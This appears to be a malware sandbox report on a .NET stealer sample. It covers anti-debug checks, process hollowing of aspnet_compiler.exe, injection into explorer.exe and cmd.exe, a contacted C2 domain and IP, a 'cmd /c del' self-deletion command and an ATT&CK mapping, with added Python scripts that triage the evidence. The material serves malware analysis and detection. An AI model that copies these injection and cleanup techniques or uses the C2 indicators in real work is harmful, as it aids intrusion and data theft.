        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C7A70E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D0131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C6F716 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02D1070D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02CDFF10 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_02C44F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7E730 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D18CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDB8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C458EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D014FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C49080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC3884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C890AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C720A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7F0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7A44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C60050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C60050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CDC450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D02073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D11074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C6746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D14015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D14015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC7016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D1740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D1740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D1740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C7BC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C5B02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CC6DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C4B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01119910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory allocated: page read and write | page guard
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C7310 SetUnhandledExceptionFilter,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
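The evidence lines above are the report's way of saying that the code injected into cmd.exe (process 14) keeps loading the PEB pointer from fs:[30h], the first step of the classic BeingDebugged / NtGlobalFlag checks, and that three processes query their own DebugPort (what CheckRemoteDebuggerPresent does under the hood). When triaging a text export of such a report it helps to collapse the repeated lines into per-function counts. The script below is an added example written for this page, not part of Joe Sandbox or of the report; the evidence string is a constructed excerpt copied from the lines above, and the TEB offset table is the documented 32-bit layout, not something the report states.

```python
import ntpath
import re
from collections import Counter, defaultdict

# Constructed excerpt of evidence lines copied from this report (process 14 is cmd.exe); the full
# report lists many more functions, this subset is only to exercise the parser.
EVIDENCE = r"""
Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02CFD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02D01C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C7310 SetUnhandledExceptionFilter,
"""

# The text export runs the source path straight into the field name ("cmd.exeCode function"),
# so the field name itself has to serve as the delimiter.
LINE = re.compile(r"^Source: (?P<src>.+?)(?P<field>Code function|Process queried): ?(?P<val>.*)$")
FS_READ = re.compile(
    r"^(?P<fn>\d+_\d+_[0-9A-F]+) mov (?P<reg>e[abcd]x|e[sd]i|e[bs]p), dword ptr fs:\[(?P<off>[0-9A-F]+)h\]$")

# 32-bit TEB fields addressed through fs: (documented x86 layout, assumption of this example).
# fs:[30h] yields the PEB pointer; BeingDebugged (PEB+0x02) and NtGlobalFlag (PEB+0x68) are one
# more load away, which the report's disassembly excerpt does not show.
TEB_OFFSETS = {0x18: "TEB.NtTib.Self", 0x30: "TEB.ProcessEnvironmentBlock (PEB pointer)"}


def parse(lines):
    """Yield (source_process, field, value) for every evidence line the regex understands."""
    for raw in lines:
        m = LINE.match(raw.strip())
        if m:
            yield m["src"], m["field"], m["val"]


def summarize(lines):
    """Count fs: reads per (process, function, TEB offset) and register; collect DebugPort queries."""
    per_fn = defaultdict(Counter)
    debugport = set()
    for src, field, val in parse(lines):
        if field == "Process queried" and val == "DebugPort":
            debugport.add(src)
        elif field == "Code function":
            m = FS_READ.match(val)
            if m:
                per_fn[(src, m["fn"], int(m["off"], 16))][m["reg"]] += 1
    return per_fn, debugport


def report(lines):
    """Human-readable triage lines: one per function, then one per DebugPort query."""
    per_fn, debugport = summarize(lines)
    out = []
    for (src, fn, off), regs in sorted(per_fn.items()):
        what = TEB_OFFSETS.get(off, f"fs:[{off:#x}]")
        regs_s = ", ".join(f"{r} x{n}" for r, n in sorted(regs.items()))
        out.append(f"{ntpath.basename(src)} {fn}: reads {what} ({regs_s})")
    for src in sorted(debugport):
        # "Process queried: DebugPort" is the ProcessDebugPort information class, the query
        # CheckRemoteDebuggerPresent makes through NtQueryInformationProcess.
        out.append(f"{ntpath.basename(src)}: queries ProcessDebugPort")
    return out


if __name__ == "__main__":
    print("\n".join(report(EVIDENCE.strip().splitlines())))
```

Run against the full evidence list the output is one line per function with the register breakdown, which is what you want when deciding whether the fs:[30h] reads are generic runtime code (a handful of sites) or a deliberate anti-debug sweep (dozens of sites, as here).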

        HIPS / PFW / Operating System Protection Evasion

        barindex
Source: C:\Windows\explorer.exe | Domain query: www.mercydm.mobi
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 1B0000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write (2x)
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 97B008
Source: U8RYIwIvfK.exe, u200b???????????????????????????????????????.cs | Reference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u200b???????????????????????????????????????.cs | Reference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 3452
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (3x)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.271403938.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.316353036.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: XProgram Manager
Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.326808107.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.346736658.0000000005D90000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.271403938.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.315487552.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.271403938.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.316353036.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Queries volume information: C:\Users\user\Desktop\U8RYIwIvfK.exe VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_001D3C49 GetSystemTime,SystemTimeToFileTime,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 14_2_001B443C GetVersion,
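Read together, the HIPS lines above describe a three-hop injection chain: the .NET dropper creates aspnet_compiler.exe, allocates an RWX region at its image base 0x400000, writes a buffer beginning with the MZ magic (4D5A) there (process hollowing); the hollowed aspnet_compiler.exe then maps an RWX section into explorer.exe and queues an APC to it; the explorer.exe payload spawns cmd.exe, injects into it, and finally runs cmd /c del on the hollowed host binary to clean up. The script below reconstructs that chain from the evidence lines and flags the create-then-overwrite shape of hollowing. It is an added example written for this page, not code from Joe Sandbox or from the report; the evidence string is a constructed excerpt copied from the lines above, and the edge tags are names chosen here.

```python
import ntpath
import re

# Constructed excerpt of the HIPS / OS protection evasion evidence lines copied from this report.
EVIDENCE = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 1B0000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\U8RYIwIvfK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread register set: target process: 3452
Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3452
Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
"""

FIELDS = ("Memory allocated", "Memory written", "Section loaded", "Section unmapped",
          "Thread APC queued", "Thread register set", "Process created")
LINE = re.compile(r"^Source: (?P<src>.+?)(?P<field>" + "|".join(FIELDS) + r"): (?P<val>.*)$")
MEM = re.compile(r"^(?P<target>.+?) base: (?P<base>[0-9A-F]+)"
                 r"(?: protect: (?P<prot>.+?))?(?: value starts with: (?P<magic>[0-9A-F]+))?$")
SEC_LOADED = re.compile(r"^unknown target: (?P<target>.+?) protection: (?P<prot>.+)$")
SEC_UNMAPPED = re.compile(r"^(?P<target>.+?) base address: (?P<base>[0-9A-F]+)$")
THREAD = re.compile(r"^target process: (?P<target>.+)$")


def parse_events(lines):
    """Turn evidence lines into dicts with src, action, target, base, prot, magic, cmdline."""
    events = []
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue
        ev = dict(src=m["src"], action=m["field"], target=None, base=None, prot=None, magic=None, cmdline=None)
        val, d = m["val"], None
        if ev["action"] in ("Memory allocated", "Memory written"):
            d = MEM.match(val)
        elif ev["action"] == "Section loaded":
            d = SEC_LOADED.match(val)
        elif ev["action"] == "Section unmapped":
            d = SEC_UNMAPPED.match(val)
        elif ev["action"] == "Process created":
            # First token is the image path; the command lines in this report have no spaces in it.
            image, _, cmdline = val.partition(" ")
            ev.update(target=image, cmdline=cmdline)
        else:  # Thread APC queued / Thread register set
            d = THREAD.match(val)
        if d:
            ev.update(d.groupdict())
            if ev["base"] is not None:
                ev["base"] = int(ev["base"], 16)
        events.append(ev)
    return events


def short(path):
    """Basename of a Windows path; a bare PID such as 3452 is returned unchanged."""
    return ntpath.basename(path) if path else path


def find_indicators(events):
    """Return a set of (source, target, tag) edges describing the injection chain."""
    rwx_alloc, pe_hosts = set(), set()
    for ev in events:  # first pass, so that evidence line order does not matter
        if ev["action"] == "Memory allocated" and ev["prot"] and "execute" in ev["prot"] and "write" in ev["prot"]:
            rwx_alloc.add((ev["src"], ev["target"], ev["base"]))
        if ev["action"] == "Memory written" and ev["magic"] == "4D5A":
            pe_hosts.add(ev["target"])
    edges = set()
    for ev in events:
        s, t, a = short(ev["src"]), short(ev["target"]), ev["action"]
        if a == "Memory written" and ev["magic"] == "4D5A":
            rwx = (ev["src"], ev["target"], ev["base"]) in rwx_alloc
            edges.add((s, t, "pe-write-rwx" if rwx else "pe-write"))
        elif a == "Section loaded" and ev["prot"] and "execute" in ev["prot"]:
            edges.add((s, t, "rwx-section-mapped"))
        elif a == "Section unmapped":
            edges.add((s, t, "section-unmapped"))
        elif a == "Thread APC queued":
            edges.add((s, t, "apc-queued"))
        elif a == "Thread register set":
            edges.add((s, t, "thread-context-set"))
        elif a == "Process created":
            edges.add((s, t, "process-created"))
            m = re.search(r'/c del "(?P<path>[^"]+)"', ev["cmdline"] or "", re.I)
            if m and m["path"] in pe_hosts:  # deleting a binary that was used as an injection host
                edges.add((s, short(m["path"]), "self-delete-of-pe-host"))
    return edges


def hollowing_candidates(edges):
    """(source, target) pairs where the source created the target and then wrote a PE into an RWX region of it."""
    created = {(s, t) for s, t, tag in edges if tag == "process-created"}
    return sorted((s, t) for s, t, tag in edges if tag == "pe-write-rwx" and (s, t) in created)


if __name__ == "__main__":
    edges = find_indicators(parse_events(EVIDENCE.strip().splitlines()))
    for s, t, tag in sorted(edges):
        print(f"{s} -> {t} [{tag}]")
    print("hollowing candidates:", hollowing_candidates(edges))
```

The "Thread register set" target is a bare PID (3452) because the report did not resolve it, so the script keeps the PID rather than guessing the image; a real pipeline would join it against the process tree.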

        Stealing of Sensitive Information

        barindex
Source: Yara match | File source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
Source: Yara match | File source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

MITRE ATT&CK matrix (techniques followed by a figure are the ones the report maps this sample's signatures to; the figure is reproduced as the matrix shows it, the other cells are the unmatched remainder of the matrix)

Initial Access: Valid Accounts (1); no hits: Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: Native API (1), Shared Modules (1); no hits: At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript
Persistence: Valid Accounts (1); no hits: Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
Privilege Escalation: Valid Accounts (1), Access Token Manipulation (1), Process Injection (812); no hits: Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)
Defense Evasion: Rootkit (1), Masquerading (1), Valid Accounts (1), Access Token Manipulation (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Process Injection (812), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), Software Packing (11)
Credential Access: Credential API Hooking (1); no hits: LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: System Time Discovery (1), Security Software Discovery (241), Process Discovery (2), Virtualization/Sandbox Evasion (31), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (125); no hits: Network Service Scanning, System Network Connections Discovery, Process Discovery
